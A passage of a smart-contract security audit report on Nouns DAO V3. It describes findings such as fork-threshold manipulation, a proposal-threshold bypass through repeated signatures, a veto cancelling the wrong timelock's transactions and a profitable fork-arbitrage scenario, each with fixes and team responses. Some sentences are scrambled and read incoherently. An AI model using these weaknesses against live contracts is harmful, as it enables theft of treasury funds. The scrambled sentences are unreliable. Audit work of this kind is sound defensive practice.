MIN_FORK_PERIOD enforced (MAX is 14 days). This in combination with an unreasonably high forkThresholdBPS (no min/max enforced) will allow a malicious majority to hold captive those minority Noun holders who missed the fork escrow window, cannot join the fork in the unreasonably small fork period and do no have sufficient voting power to fork again. While the accidental setting of the lower bound to an undesirable value poses a lower risk than that of the upper bound, this is yet another vector of attack by a malicious majority on forking capability/effectiveness. While the majority can upgrade the DAO entirely at will to circumvent all such guardrails, we hypothesise that would get more/all attention by token holders than modification of governance/fork parameters whose risk/impact may not be apparent immediately to non-technical or even technical holders. So unless there is an automated impact review/analysis performed as part of governance processes, such proposal vectors on governance/forking parameters should be considered as posing non-negligible risk. Impact: Inattentive minority Noun holders are unable to join the fork and forced to stick with the original DAO. Low likelihood + High impact = Medium severity. Recommendation: (1) Consider a MIN_FORK_PERIOD value e.g. 2 days for forkPeriod which gives a better opportunity to inattentive/unsure minority Noun holders to join the fork now that it already exists. (2) Consider preventing the decrease of forkPeriod if a fork is in the escrow period. Nouns: Mitigation: PR 716. Spearbit: Verified that PR 716 fixes the issue by enforcing a MIN_FORK_PERIOD of 2 days in _setForkPeriod(). +5.2.14 A malicious DAO can prevent forking by manipulating the forkThresholdBPS value Severity: Medium Risk Context: NounsDAOV3Admin.sol#L530-L537 Description: While some of the documentation, see 1 and 2, note that the fork threshold is expected to be 20%, the forkThresholdBPS is a DAO governance controlled value that may be modified via _setForkThresholdBPS(). A malicious majority can prevent forking at any time by setting the forkThresholdBPS to an unreasonably high value that is >= majority voting power. For a fork that is slowly gathering support via escrowing (thus giving time for a DAO proposal to be executed) , a malicious majority can reactively manipulate forkThresholdBPS to prevent that fork from being executed. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties and their impacts. Token holders need to actively monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. A malicious majority can prevent a minority from forking by manipulating the forkThresholdBPS value. Low likelihood + High impact = Medium severity. Recommendation: Mitigation options: (1) Consider a MAX_FORK_THRESHOLD value e.g. 50% for forkThresh- oldBPS. (2) Consider preventing the increase of forkThresholdBPS if a fork is in the escrow period. Nouns: 25 We don't think a maximum value is needed here. If a malicious majority can set this value to be unreasonably high without the minority noticing, it's likely they would also be able to upgrade the DAO contracts without them noticing. Spearbit: Acknowledged. +5.2.15 A malicious DAO can prevent/deter token holders from executing/joining a fork by including arbi- trary addresses in erc20TokensToIncludeInFork Severity: Medium Risk Context: NounsDAOV3Fork.sol#L224-L228 Description: As motivated in the fork spec, forking is a minority protection mechanism that should always allow a group of minority token holders to exit together into a new instance of Nouns DAO. in the (modifiable original DAO may a malicious majority in However, erc20TokensToIncludeInFork on balanceOf() or transfer() calls to prevent token holders from executing or joining a fork. While the governance process gives an opportunity to detect and block such malicious proposals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates to create, execute and join a fork before such a proposal takes effect. _setErc20TokensToIncludeInFork()) addresses revert arbitrary include that via Furthermore, a forking token holder may not necessarily want to receive all the DAO's ERC20 tokens in their new fork DAO for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions and so they may not want to interact with a DAO whose treasury holds such tokens and may send them at some point (e.g. rage quit). Minority token holders may even want to fork specifically because of an ERC20's presence or proposed inclusion in the DAO treasury. Giving forking holders a choice of ERC20s to take to fork DAO gives them a choice to fork anytime only with ETH and a subset of approved tokens if the DAO has already managed to add malicious/contentious ERC20s in the list. 1. A malicious DAO can prevent unsuspecting/inattentive or future token holders from forking and taking out their pro rata funds, which is the main motivation for minority protection as specified. 2. A forking token holder is forced to end up with a fork DAO treasury that has all the original DAO's ERC20 tokens without having a choice, which may deter them from creating/executing/joining a fork in the first place. Low likelihood + High impact = Medium severity. Recommendation: Reconsider the design choice and threat/trust models to evaluate the feasibility of a better one, e.g. when a fork gets triggered, the first caller of escrowToFork() (the initiator) could get to choose a subset of erc20TokensToIncludeInFork for their fork, after which executefork() and all joinFork()s only send those tokens to the fork DAO treasury. Nouns: Won't fix. We see the risk of adding a malicious token to erc20TokensToIncludeInQuit to be low, because it needs to go through a proposal process which is being reviewed by the DAO members. In addition, we don't want to give the first caller of escrowToFork special privileges that may not be in agreement with other members who wish to fork. Spearbit: Acknowledged. 26 +5.2.16 A malicious new DAO can prevent/deter token holders from rage quitting by including arbitrary addresses in erc20TokensToIncludeInQuit Severity: Medium Risk Context: NounsDAOLogicV1Fork.sol#L201-L215 Description: As described in the fork spec: "New DAOs are deployed with vanilla ragequit in place; otherwise it's possible for a new DAO majority to collude to hurt a minority, and the minority wouldn't have any last resort if they can't reach the forking threshold; furthermore bullies/attackers can recursively chase minorities into fork DAOs in an undesired attrition war.". However, a malicious new DAO may include arbitrary addresses in erc20TokensToIncludeInQuit (modifiable via _setErc20TokensToIncludeInQuit()) that revert on balanceOf() or transfer() calls to prevent token holders from rage quitting. While the governance process gives an opportunity to detect and block such malicious pro- posals, the assumption is that a malicious majority can force through any proposal, even a visibly malicious one. Also, it is not certain that all governance proposals undergo thorough scrutiny of security properties which allows a proposal to hide malicious ERC20 tokens and get them included in the DAO's allow list. Token holders need to monitor all proposals for malicious updates and rage quit before such a proposal takes effect. Furthermore, a rage quitting token holder may not necessarily want to receive all the DAO's ERC20 tokens for various reasons. For e.g., custody of certain ERC20 tokens may not be legal in their regulatory jurisdictions. (1) A malicious new DAO can prevent unsuspecting/inattentive token holders from rage quitting and taking out their pro rata funds, which is a critical capability for minority protection as specified. (2) A rage quitting token holder is forced to receive all the DAO's ERC20 tokens without having a choice, which may deter them from quitting. Recommendation: Consider accepting an ERC20 token list, which is a subset of erc20TokensToIncludeInQuit, from the user to allow them to choose/skip ERC20 tokens. Nouns: Fix: PR 732. Spearbit: Verified that PR 732 fixes the issue as recommended. +5.2.17 Missing check for vetoed proposal's target timelock can cancel transactions from other proposals on new DAO treasury Severity: Medium Risk NounsDAOV3Proposals.sol#L435 NounsDAOV3Proposals.sol#L527-L544 Context: DAOV3Proposals.sol#L472 NounsDAOV3Proposals.sol#L590 Description: veto() always assumes that the proposal being vetoed is targeting ds.timelock (i.e. the new DAO treasury) instead of checking via getProposalTimelock() as done by queue(), execute() and cancel() functions. If the proposal being vetoed were targeting timelockV1 (i.e. original DAO treasury) then this results in calling cancelTransaction() on the wrong timelock which sets queuedTransactions[txHash] to false for values of target, value, signature, data and eta. The proposal state is vetoed with zombie queued transactions on timelockV1 which will never get executed. But if there coincidentally were valid transactions with the same values (of target, value, signature, data and eta) from other proposals queued (assuming in the same block and that both timelocks have the same delay so that eta is the same) on ds.timelock then those would unexpectedly and incorrectly get dequeued and will not be executed even when these other ds.timelock targeting proposals were neither vetoed nor cancelled. Successfully voted proposals on new DAO treasury have their transactions cancelled before execution. Nouns- Confirmed with PoC: veto_poc.txt Low likelihood + High impact = Medium severity. Recommendation: Check vetoed proposal's target timelock via getProposalTimelock() and use that as done by queue(), execute() and cancel() functions. Nouns: Mitigation: PR 715. Spearbit: Verified that PR 715 fixes the issue as recommended. 27 +5.2.18 Proposal threshold can be bypassed through the proposeBySigs() function Severity: Medium Risk Context: NounsDAOV3Proposals.sol#L229 Description: The function proposeBySigs() allows users to delegate their voting power to a proposer through signatures so the proposer can create a proposal. The only condition is that the sum of the signers voting power should be higher than the proposal threshold. In the line uint256 proposalId = ds.proposalCount = ds.proposalCount + 1;, the ds.proposalCount is in- creased but the proposal has not been created yet, meaning that the NounsDAOStorageV3.Proposal struct is, at this point, uninitialized, so when the checkNoActiveProp() function is called the proposal state is DEFEATED. As the proposal state is DEFEATED the checkNoActiveProp() call would not revert in the case that a signer is repeated in the NounsDAOStorageV3.ProposerSignature[] array: function checkNoActiveProp(NounsDAOStorageV3.StorageV3 storage ds, address proposer) internal view { uint256 latestProposalId = ds.latestProposalIds[proposer]; if (latestProposalId != 0) { NounsDAOStorageV3.ProposalState proposersLatestProposalState = state(ds, latestProposalId); if ( proposersLatestProposalState == NounsDAOStorageV3.ProposalState.ObjectionPeriod || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Active || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Pending || proposersLatestProposalState == NounsDAOStorageV3.ProposalState.Updatable ) revert ProposerAlreadyHasALiveProposal(); } } Because of this it is possible to bypass the proposal threshold and create any proposal by signing multiple pro- poserSignatures with the same signer over and over again. This would keep increasing the total voting power accounted by the smart contract until this voting power is higher than the proposal threshold. Medium likelihood + Medium Impact = Medium severity. Consider NounsDAOStor- Recommendation: ageV3.ProposerSignature[] verifySignersCanBack- ThisProposalAndCountTheirVotes() function. By doing this, when verifySignersCanBackThisProposalAnd- CountTheirVotes() is called the proposal state will be correct and any repeated signer would cause a revert during the checkNoActiveProp(ds, signer); call. before createNewProposal() verifying before proposal creating calling array the the by Nouns: Followed Spearbit's recommendation and fixed the issue in PR 711. Spearbit: Acknowledged. 28 5.3 Low Risk +5.3.1 Attacker can utilize bear market conditions to profit from forking the Nouns DAO Severity: Low Risk Context: NounsDAOV3Fork.sol#L212-L231 Description: An economic attack vector has been identified that could potentially compromise the integrity of the Nouns DAO treasury, specifically due to the introduction of forking functionality. Currently, the treasury holds approximately $24,745,610.99 in ETH and about $27,600,000 in STETH. There are roughly 738 nouns tokens. As per OpenSea listings, the cheapest nouns-token can be purchased for about 31 ETH, approximately $53,000. Meanwhile, the daily auction price for the nouns stands at approximately 28 ETH, which equals about $48,600. A prospective attacker may exploit the current bear market conditions, marked by discounted price, to buy multiple nouns-tokens at a low price, execute a fork to create a new DAO and subsequently claim a portion of the treasury. This act would result in the attacker gaining more than they invested at the expense of the Nouns DAO treasury. To illustrate, if the forking threshold is established at 20%, an attacker would need 148 nouns to execute a fork. Consider the scenario where a user purchases 148 nouns for a total of 4588 ETH (148 x 31 ether). The fork- Treasury.balance would be 2679.27 ETH, and the contract_stETH.balanceOf(forkTreasury) would stand at 3000.7 ETH. The total ETH obtained would amount to 5680.01 ETH, thereby yielding a profit of 1092 ETH ($2,024,568). Recommendation: Consider updating original DAO auction house reserve price and evaluate market controlling initiatives, say nouns buybacks with treasury funds and their subsequent burning (given low market prices it will be profit generating activity in terms of nouns valuation). Nouns: We are aware of the incentives the fork mechanism creates. For now we will not introduce any more changes, but this is a topic that will continue to be discussed. Spearbit: Acknowledged. +5.3.2 Setting NounsAuctionHouse's timeBuffer too big is possible, which will freeze bidder's funds Severity: Low Risk Context: NounsAuctionHouse.sol#L161-L169 Description: It's now possible to set timeBuffer to an arbitrary big value with setTimeBuffer(), there is no control: • NounsAuctionHouse.sol#L161-L169 /** * @notice Set the auction time buffer. * @dev Only callable by the owner. */ function setTimeBuffer(uint256 _timeBuffer) external override onlyOwner { timeBuffer = _timeBuffer; emit AuctionTimeBufferUpdated(_timeBuffer); } This can freeze user funds as NounsAuctionHouse holds current bid, but the its release in conditional to block.timestamp >= _auction.endTime: • NounsAuctionHouse.sol#L96-L98 function settleAuction() external override whenPaused nonReentrant { _settleAuction(); } 29 • NounsAuctionHouse.sol#L221-L234 function _settleAuction() internal { INounsAuctionHouse.Auction memory _auction = auction; require(_auction.startTime != 0, "Auction hasn't begun"); require(!_auction.settled, 'Auction has already been settled'); require(block.timestamp >= _auction.endTime, "Auction hasn't completed"); >> auction.settled = true; if (_auction.bidder == address(0)) { nouns.burn(_auction.nounId); } else { nouns.transferFrom(address(this), _auction.bidder, _auction.nounId); } Which can be set to be arbitrary big value, say 10ˆ6 years, effectively freezing current bidder's funds: • NounsAuctionHouse.sol#L104-L129 function createBid(uint256 nounId) external payable override nonReentrant { ... // Extend the auction if the bid was received within `timeBuffer` of the auction end time bool extended = _auction.endTime - block.timestamp < timeBuffer; if (extended) { >> auction.endTime = _auction.endTime = block.timestamp + timeBuffer; } I.e. permissionless settleAuction() mechanics will be disabled. Current bidder's funds will be frozen for an arbitrary time. As the new setting needs to pass voting, the probability is very low. In the same time it is higher for any forked DAO than for original one, so, while the issue is present in the V1 and V2, it becomes more severe in V3 in the context of the forked DAO. The impact is high, being long-term freeze of the bidder's native tokens. Recommendation: Consider introducing upper limit to timeBuffer, say 1 day. Nouns: At this point, due to this requiring going through a DAO proposal, we'll leave it at won't fix Spearbit: Acknowledged. +5.3.3 Veto renouncing in the original DAO or rage quit blocking in a forked DAO as a result of any future proposals will open up the way for 51% attacks Severity: Low Risk Context: NounsDAOLogicV2.sol#L900-L915, NounsDAOV3Admin.sol#L318-L333, NounsDAOLogicV1Fork.sol#L195- L222 Description: It is possible to renounce veto power in V1, V2 and V3 versions of the protocol or upgrade forked V1 to block or remove rage quit. While it is a part of standard workflow, these operations are irreversible and open up a possibility of all variations of 51% attack. As a simplest example, in the absence of veto functionality a majority can introduce and execute a proposal to move all DAO treasury funds to an address they control. Also, there is a related vector, incentivized bad faith voting. _burnVetoPower() exists in V1, V2 and V3: In NounsDAOLogicV1 : 30 /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is pendingAdmin and pendingAdmin require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); address(0) _setVetoer(address(0)); } In NounsDAOLogicV2: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower() public { // Check caller is vetoer require(msg.sender == vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(vetoer, address(0)); vetoer = address(0); // Clear the pending value emit NewPendingVetoer(pendingVetoer, address(0)); pendingVetoer = address(0); } In NounsDAOLogicV3: /** * @notice Burns veto priviledges * @dev Vetoer function destroying veto power forever */ function _burnVetoPower(NounsDAOStorageV3.StorageV3 storage ds) public { // Check caller is vetoer require(msg.sender == ds.vetoer, 'NounsDAO::_burnVetoPower: vetoer only'); // Update vetoer to 0x0 emit NewVetoer(ds.vetoer, address(0)); ds.vetoer = address(0); // Clear the pending value emit NewPendingVetoer(ds.pendingVetoer, address(0)); ds.pendingVetoer = address(0); } Also, veto() was removed from NounsDAOLogicV1Fork, and the only mitigation to the same attack is rage quit(): • NounsDAOLogicV1Fork.sol#L195-L222 31 /** * @notice A function that allows token holders to quit the DAO, taking their pro rata funds, * and sending their tokens to the DAO treasury. * Will revert as long as not all tokens were claimed, and as long as the delayed governance has not expired. ,! * @param tokenIds The token ids to quit with */ function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } in as an this that example function, any malfunction to forked nouns holders was previously black-listed there will be no way to stop any This means erc20TokensToIncludeInQuit, while a minority of by USDC contract, will open up the possibility of majority attack on them, i.e. majority backed malicious proposal from affecting the DAO held funds of such holders. Nouns holders that aren't aware enough of the importance of functioning veto() for original DAO and quit() for the forked DAO, can pass a proposal that renounce veto or [fully or partially] block quit(), enabling the 51% attack. Such change will be irreversible and if a majority forms and acts before any similar mitigation functionalities be reinstalled, the whole DAO funds of the rest of the holders can be lost. Per very low likelihood (which increases with the switch from veto() to quit() as a safeguard), and high funds loss impact, setting the severity to be low. if USDC is added Recommendation: Key mitigation here is educating the holders of the roles of these two functions. The surface will not exist as long as most of the holders are aware of the possibility of the attack and these guards being in place and reject any proposal affecting them. Consider highlighting _burnVetoPower() effect on opening 51% attack vector for original DAOs, and emphasizing the availability of forked DAO quit() as the only safeguard in place against the same vector. Note, that with the absence of veto() in the forked DAO it will be a wider range of possible changes that have a potential to create this vector (not only quit() removal, but quit() blocking for any reason). Nouns: The DAO members are well aware of the risk of 51% attack and the importance of veto and fork/quit options. We will make sure this stays in awareness of all members. Spearbit: Acknowledged. 32 +5.3.4 The try-catch block at NounsAuctionHouseFork will only catch errors that contain strings Severity: Low Risk Context: NounsAuctionHouseFork.sol#L213-L229 Description: This issue has been previously identified and documented in the Nouns Builder Code4rena Audit. The catch Error(string memory) within the try/catch block in the _createAuction function only catches re- verts that include strings. At present, in the current version of the NounsAuctionHouseFork there are not reverts without a string. But, given the fact that the NounsAuctionHouseFork and the NounsTokenFork contracts are meant to be upgrad- able, if a future upgrade in the NounsTokenFork:mint() replaces the require statements with custom errors, the existing catch statement won't be able to handle the reverts, potentially leading to a faulty state of the contract. Here's an example illustrating that the catch Error(string memory) won't catch reverts with custom errors that don't contain strings: contract Test1 { bool public error; Test2 test; constructor() { test = new Test2(); } function testCustomErr() public{ try test.revertWithRevert(){ } catch Error(string memory) { error = true; } } function testRequire() public{ try test.revertWithRequire(){ } catch Error(string memory) { error = true; } } } contract Test2 { error Revert(); function revertWithRevert() public{ revert Revert(); } function revertWithRequire() public { require(true == false, "a"); } } Recommendation: If the NounsTokenFork:mint() methods of the NounsTokenFork changes to include custom errors as the revert reason, it is recommended to modify the catch Error(string memory) to also catch errors that don't contain strings. However, it is not advisable to change catch Error(string memory) to catch, as this modification could uninten- tionally capture unwanted reverts, such as those due to an out-of-gas condition. 33 Nouns: We will take this into consideration if the errors change from strings to custom errors. For now, we won't fix. Spearbit: Acknowledged. +5.3.5 Private keys are read from the .env environment variable in the deployment scripts Severity: Low Risk DeployDAOV3NewContractsBase.s.sol#L53, DeployDAOV3DataContractsBase.s.sol#L21, Context: net.s.sol#L18, ProposeDAOV3UpgradeTestnet.s.sol#L32, ProposeTimelockMigrationCleanupMainnet.s.sol#L22 Description: It has been identified that the private key of privileged (PROPOSER_KEY and DEPLOYER_PRIVATE_KEY) accounts are read the environment variables within scripts. The deployer address is verified on Etherscan as Nouns DAO: Deployer. Additionally, since the proposal is made by the account that owns the PROPOSER_KEY, it can be assumed that the proposer owns at least some Nouns. ProposeENSReverseLookupConfigMain- ProposeDAOV3UpgradeMainnet.s.sol#L24, Given the privileged status of the deployer and the proposer, unauthorized access to this private key could have a negative impact in the reputation of the Nouns DAO. The present method of managing private keys, i.e., through environment variables, represents a potential security risk. This is due to the fact that any program or script with access to the process environment can read these variables. As mentioned in the Foundry documentation: This loads in the private key from our .env file. Note: you must be careful when exposing private keys in a .env file and loading them into programs. This is only recommended for use with non-privileged deployers or for local / test setups. For production setups please review the various wallet options that Foundry supports. Recommendation: Consider employing alternative methods to load the private keys in the deployment scripts. Some alternatives as suggested in the ETHSecurity channel include: 1. AWS Secret Manager 2. AWS CloudHSM 3. AWS KMS External Key Store (XKS) 4. AWS Nitro Enclaves Nouns: The PROPOSER_KEY doesn't need to necessarily own Nouns, it can be delegated some voting power. In any case, we will consider changing this, but for now, won't fix. Spearbit: Acknowledged. 34 +5.3.6 Objection period will be disabled after the update to V3 is completed Severity: Low Risk Context: ProposeDAOV3UpgradeMainnet.s.sol, ProposeTimelockMigrationCleanupMainnet.s.sol Description: Nouns DAO V3 introduces a new functionality called objection-only period. This is a conditional voting period that gets activated upon a last-minute proposal swing from defeated to successful, affording against voters more reaction time. Only against votes will be possible during the objection period. After the proposals created in ProposeDAOV3UpgradeMainnet.s.sol and ProposeTimelockMigrationCleanup- Mainnet.s.sol are executed lastMinuteWindowInBlocks and objectionPeriodDurationInBlocks will still re- main set to 0. A new proposal will have to be created, passed and executed in the DAO that calls the _setLast- MinuteWindowInBlocks() and _setObjectionPeriodDurationInBlocks() functions to enable this functionality. Recommendation: Consider adding to the ProposeTimelockMigrationCleanupMainnet.s.sol's proposal 2 the _setLastMinuteWindowInBlocks() and _setObjectionPeriodDura- new transactions that call and set tionInBlocks(). Nouns: This was done intentionally as we want the upgrade to start with this feature turned off. We want the DAO to vote separately on the parameters they want to turn it on with. Won't fix. Spearbit: Acknowledged. +5.3.7 Potential risks from outdated OpenZeppelin dependencies in the Nouns DAO v3 Severity: Low Risk Context: yarn.lock#L4191-L4192, yarn.lock#L4196-L4197 Description: The OpenZeppelion libraries are being used throughout the Nouns DAO v3 codebase. These li- braries however, are locked at version 4.4.0, which is an outdated version that has some known vulnerabilities. Specifically: • The SignatureChecker.isValidSignatureNow is not expected to revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't imple- ment EIP-1271 as expected. The contracts that may be affected are those that use SignatureChecker to check the validity of a signature and handle invalid signatures in a way other than reverting. • The ERC165Checker.supportsInterface is designed to always successfully return a boolean, and under no circumstance revert. However, an incorrect assumption about Solidity 0.8's abi.decode allows some cases to revert, given a target contract that doesn't implement EIP-165 as expected, specifically if it returns a value other than 0 or 1. The contracts that may be affected are those that use ERC165Checker to check for support for an interface and then handle the lack of support in a way other than reverting. At present, these vulnerabilities do not appear to have an impact in the Nouns DAO codebase, as corresponding functions revert upon failure. Nevertheless, these vulnerabilities could potentially impact future versions of the codebase. Recommendation: As a security measure, it is advisable to update the version of the OpenZeppelin libraries in both the yarn.lock and the package.json files. Nouns: We will consider it for the future. For now, we won't fix. Spearbit: Acknowledged. 35 +5.3.8 DAO withdraws forked ids from escrow without emphasizing total supply increase which contra- dicts the spec and can catch holders unaware Severity: Low Risk Context: NounsDAOV3Fork.sol#L160-L178 Description: Withdrawal original nouns with ids of the forked tokens from escrow after the successful fork is a material event for all original nouns holders as the adjusted total supply is increased as long as withdrawal recipient is not treasury. There were special considerations regarding Nouns withdrawal impact after the fork: For this reason we're considering a change to make sure transfers go through a new function that helps Nouners ,! understand the implication, e.g. by setting the function name to withdrawNounsAndGrowTotalSupply or something similar, as well as emitting events that indicate the new (and greater) total supply used ,! by the DAO. However, currently withdrawDAONounsFromEscrow() neither have a special name, nor mentions the increase of adjusted total supply when to != ds.timelock: • NounsDAOV3Fork.sol#L160-L178 /** * @notice Withdraws nouns from the fork escrow after the fork has been executed * @dev Only the DAO can call this function * @param tokenIds the tokenIds to withdraw * @param to the address to send the nouns to */ function withdrawDAONounsFromEscrow( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, address to ) external { if (msg.sender != ds.admin) { revert AdminOnly(); } ds.forkEscrow.withdrawTokens(tokenIds, to); emit DAOWithdrawNounsFromEscrow(tokenIds, to); } Nouns holder might not understand the consequences of withdrawing the nouns from escrow and support such a proposal, while as of now it is approximately USD 65k loss per noun withdrawn cumulatively for current holders. The vulnerability scenario here is a holder supporting the proposal without understanding the consequences for supply, as no emphasis is made, and then suffers their share of loss as a result of its execution. Per low likelihood and impact setting the severity to be low. Recommendation: Consider emitting a special event when to != timelock, for example: if (to != address(ds.timelock)) { emit DAONounsSupplyIncreasedFromEscrow(tokenIds.length, to); } In order to emphasize the supply increase consider splitting withdrawDAONounsFromEscrow() into 2 functions: • First, for example, withdrawDAONounsFromEscrowToTreasury, having no to argument and performing ds.forkEscrow.withdrawTokens(tokenIds, address(ds.timelock)) 36 • Second, for address(ds.timelock), performing DAONounsSupplyIncreasedFromEscrow example, withdrawDAONounsFromEscrowIncreasingTotalSupply, ds.forkEscrow.withdrawTokens(tokenIds, to) requiring and to != emitting Nouns: Fix: nounsDAO/nouns-monorepo#735. Spearbit: Fix looks good. +5.3.9 USDC-paying proposals executing between ProposeDAOV3UpgradeMainnet and ProposeTimelockMi- grationCleanupMainnet will fail Severity: Low Risk Context: Known-Issues ProposeDAOV3UpgradeMainnet.s.sol#L106-L116 Description: As explained in one of the Known Issues, ProposeDAOV3UpgradeMainnet contains a proposal that transfers the ownership of PAYER_MAINNET and TOKEN_BUYER_MAINNET from timelockV1 to timelockV2. There could be older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet which assume timelockV1 ownership of these contracts. Older USDC-paying proposals executing after ProposeDAOV3UpgradeMainnet will fail. Recommendation: While the proposed mitigation is: "Our mitigation to this issue will be communication with the DAO ahead of time, and should we see any proposals in this state, we will contact their proposers immedi- ately and help them re-propose.", the number of affected proposals could be reduced if the ownership transfers of PAYER_MAINNET and TOKEN_BUYER_MAINNET are moved from ProposeDAOV3UpgradeMainnet to ProposeTimelock- MigrationCleanupMainnet, which will at least prevent the older proposals executing between these two proposals from failing due to this reason. Nouns: Fixed: nounsDAO/nouns-monorepo#734. Spearbit: Verified that PR 734 fixes the issue as recommended. +5.3.10 Zero value ERC-20 transfers can be performed on sending treasury funds to quitting member or forked DAO, denying the whole operation if one of erc20TokensToIncludeInQuit tokens doesn't allow this Severity: Low Risk Context: NounsDAOLogicV1Fork.sol#L210-L215, NounsDAOV3Fork.sol#L225-L230 Description: Some tokens do not allow for zero value transfers. Such behaviour do not violate ERC-20 standard, is not anyhow prohibited and can occur in any non-malicious token. As a somewhat well-known example Aave's LEND requires amount to be positive: • etherscan.io/address/0x80fb784b7ed66730e8b1dbd9820afd29931aab03#code#L74 function transfer(address _to, uint256 _value) returns(bool) { require(balances[msg.sender] >= _value); require(balances[_to] + _value > balances[_to]); As stETH, which is currently used by Nouns treasury, is upgradable, it cannot be ruled out that it might be requiring the same in the future for any reason. • etherscan.io/token/0xae7ab96520de3a18e5e111b5eaab095312d7fe84#code Zero value itself can occur in a situation when valid token was added to erc20TokensToIncludeInFork, but this token timelock balance is currently empty. NounsDAOLogicV1Fork's quit() and NounsDAOV3Fork's executeFork() and joinFork() will be unavailable in such scenario, i.e. the DAO forking workflow will be disabled. 37 Since the update of erc20TokensToIncludeInFork goes through proposal mechanics and major tokens rarely upgrade, while there is an additional requirement of empty balance, the cumulative probability of the scenario can be deemed quite low, while the core functionality blocking impact is high, so setting the severity to be low. Recommendation: Consider controlling amount to be positive in both cases, for example: NounsDAOLogicV1Fork's quit(): for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / + + totalSupply; ,! if (tokensToSend > 0) { bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } } The NounsDAOV3Fork:sendProRataTreasury() which is called during the executeFork() & joinFork() functions: for (uint256 i = 0; i < erc20Count; ++i) { IERC20 erc20token = IERC20(ds.erc20TokensToIncludeInFork[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenCount) / totalSupply; if (tokensToSend > 0) { bool erc20Sent = timelock.sendERC20(newDAOTreasury, address(erc20token), tokensToSend); if (!erc20Sent) revert ERC20TransferFailed(); } } + + The motivation for the suggestion is also gas optimization: while DAO transfers are once per fork, in the Nouns- DAOLogicV1Fork's quit() case every quitting member will pay for such empty transfer, while its gas costs are substantial enough. Nouns: Acknowledged. Fix PR here: nounsDAO/nouns-monorepo#727. Spearbit: Fixed as recommended. +5.3.11 A signer of multiple proposals will cause all of them except one to fail creation Severity: Low Risk Context: NounsDAOV3Proposals.sol#L818 NounsDAOV3Proposals.sol#L787-L798 Description: Like proposers, signers are also allowed to back only one proposal at a time. As commented: "This is a spam protection mechanism to limit the number of proposals each noun can back." However, unlike proposers who know which of their proposals are active and when, signers may not readily have that insight and can sign multiple proposals they may want to back. If more than one such proposal is proposed then only the first one will pass the checkNoActiveProp() for this signer and all the others will fail this check and thereby the proposal creation itself. A signer of multiple proposals will cause all of them except one to fail creation. Other proposals will have to then exclude such signatures and resubmit. This could be accidental or used by malicious signers for griefing proposal creations. Recommendation: Instead of reverting in checkNoActiveProp() when proposal signers already have an active proposal, have it return a boolean to help skip such signers from consideration in its callers. Not all signers included in proposeBySigs() have to necessarily be part of the proposal when created. propose() can choose to revert if checkNoActiveProp() returns false. Nouns: 38 Thanks for reporting. We agree this can improve UX a bit, but we think the clients should be able to identify signers with an active proposal. Won't fix Spearbit: Acknowledged. +5.3.12 Single-step ownership change is risky Severity: Low Risk Context: NounsAuctionHouseFork.sol#L34, NounsTokenFork.sol#L20 Description: The codebase primarily follows a two-step ownership change pattern. However, in specific sections, a single-step ownership change is utilized. Two-step ownership change is preferable, where: • The current owner proposes a new address for the ownership change. • In a separate transaction, the proposed new address can then claim the ownership. Recommendation: Consider implementing a two-step ownership transfer process throughout the codebase, sim- ilar to the approach used in Ownable2StepUpgradeable. Nouns: Since these ownership changes would have to go through a proposal process, this seems very low risk. We won't introduce a fix for this one. Spearbit: Acknowledged. +5.3.13 No storage gaps for upgradeable contracts might lead to storage slot collision Severity: Low Risk Context: NounsDAOExecutorV2.sol#L46, NounsAuctionHouseFork.sol#L41, NounsDAOLogicV1Fork.sol#L105, NounsTokenFork.sol#L39 Description: When implementing upgradable contracts that inherit it is important that there are storage gaps, in case new storage variables are later added to the inherited contracts. If a storage gap variable isn't added, when the upgradable contract introduces new variables, it may override the variables in the inheriting contract. As noted in the OpenZeppelin Documentation: You may notice that every contract includes a state variable named __gap. This is empty reserved It allows us to freely add new state space in storage that is put in place in Upgrade Safe contracts. variables in the future without compromising the storage compatibility with existing deployments. It isn’t safe to simply add a state variable because it "shifts down" all of the state variables below in the inheritance chain. Recommendation: To ensure the stability of future storage layout changes to the base contract, it is recommended to add a __gap variable as the last storage variable in these upgradeable contracts, resulting in a fixed total number (50 for example) of storage slots. Please note that as subsequent versions include additional storage variables, the __gap variable space will need to be adjusted accordingly to maintain the fixed number of slots. Nouns: IIUC a storage gap is only helpful if the contract which has a storage gap is itself 